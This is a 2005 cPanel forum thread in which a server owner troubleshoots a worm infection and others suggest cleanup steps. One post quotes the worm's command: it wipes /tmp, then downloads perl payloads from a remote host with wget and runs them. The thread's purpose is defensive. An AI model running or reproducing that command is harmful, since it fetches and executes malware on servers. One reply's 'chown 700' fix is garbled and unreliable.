The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

CPU overloaded by PERL

Discussion in 'General Discussion' started by Novisoft, Jan 1, 2005.

  1. Novisoft

    Novisoft Active Member

    Joined:
    Jun 6, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Algiers, Algeria.
    Hello,
    Im having some problems since a couple of day as my CPU is frequently overloaded. So sometimes the server goes down for 2 to 3 hours.

    When i use "TOP" through SSH, i can see that some process belonging to the user "nobody" and with command PERL are causing the current overload (See the attached picture top.gif).

    Also when i use "WHM>System Health>Show Current CPU Usage" i can see the process which the owner is nobody and with the command /usr/local/apache/bin/httpd -DSSL are causing CPU overload (see the attached picture cpu-usage.gif). When i click on pid number then on trace, the page is filled with hundred of line "select(8, [3], NULL, NULL, {0, 0}) = 0 (Timeout)" (see the attached fil trace.gif)

    The above line is repeating hundred of times and it doesn't stops filling the page till a go back and kill the process.

    This is really causing inconvenience to me and my customers. So they are asking me about the down time and the origine of the troubles. :(

    Can someone please help me to resolve this problem ?

    Thank you in advance

    Lyes
     

    Attached Files:

  2. Novisoft

    Novisoft Active Member

    Joined:
    Jun 6, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Algiers, Algeria.
    Oh, by the way, what is the perlwow.x process ?
    I traced it, and here is what i get (see attached file perlwowx.txt)

    I also noticed the following line : "recvfrom(5, "`d\201\200\0\1\0\4\0\t\0\2\3www\6google\3com\2br\0\0"..., 1024, 0, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("MY.IP.ADDRESS.HERE")}}, [16]) = 341"

    So, i wonder if someone is sending spams trough my server, cause i found about 7700 emails in the email queue. Most of them has been sent to emails address with something like @xxxxx.com.br

    Hope this wilp help some one to help me :)

    Thanks once again

    Lyes
     

    Attached Files:

    #2 Novisoft, Jan 1, 2005
    Last edited: Jan 1, 2005
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    That very much looks like the the santy/phpbb worm in action.

    You need to secure your server, get any phpBB scripts upgraded. Install mod_security with good filters (do a search, they've been posted recently). Clean up the worm and kill the processes.

    One way of finding which processes are actually part of the worm is to use:

    lsof | grep /tmp

    Looks for anthing out of the ordinary (i.e. not mysql, etc).

    If you don't know how to do the above, you should consider hiring a server administrator.
     
  4. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    ls -l /proc/xxxx

    where xxxx is the PID number may tell you where the script is located.
     
  5. Novisoft

    Novisoft Active Member

    Joined:
    Jun 6, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Algiers, Algeria.
    Thank you guys for your replies.

    I located the wow.x end deleted it, i killed all process handled by wow.x after stopping apache and i just updated php to 4.3.10.

    I will try to find if is there other copies of wow.x in other directories, if yes i'll delet them and reboot the server. Can someone tell me how can i search files by their names through ssh on linus redhat ?

    After that, I will check all php scripts installed avoiding vulerability, and will also install a good mod_security filters.

    If there is something i messed up, just remember me it :)

    Thanks once again

    Lyes
     
  6. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    Try

    # updatedb

    when that completes

    # locate wow.x

    or without updating the file db

    find / -name wow.x

    Those should work.

    You probably don't need to reboot the server, but if you can if you want to, it won't do any harm to start up clean.
     
  7. Novisoft

    Novisoft Active Member

    Joined:
    Jun 6, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Algiers, Algeria.
    Hello guys,
    I thought the problem was gone but, i just found wow.x in the /tmp directory. The hackers did something to bring back the wow files from their web site even if i delete them and kill all precess owned by perlwow.x and perl.

    Below the command i found on cpu usage. Can someone give me a hint to stop that :(

    sh-cecho _START_; cd /tmp;cd rm -rf *;wget http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl sess_0bc3910d07edb36750a9babbd179edb4;wget http://filepack.superbr.org/wow.f;perl wow.f;wget http://filepack.superbr.org/wow.x;perl wow.x; echo _END_

    Thank you very much

    Lyes

    PS : more information about the worm on http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php
     
  8. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    better check your apache logs for the insecure script that the worm is getting into the server through... you can try grepping for words such as 'tmp', 'perl', 'wget' to find the lines where attempts have been made against your scripts. And then secure or remove those scripts.

    Though, it's still highly recommended that you hire a compentent server admin to secure your box.
     
  9. casey

    casey Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    2,303
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    If there is trouble, it will find me
    Until you can get a handle on everything you should do

    chown 700 /usr/bin/wget

    That way they won't be able to put the files back into tmp again for the time being.
     
Loading...

Share This Page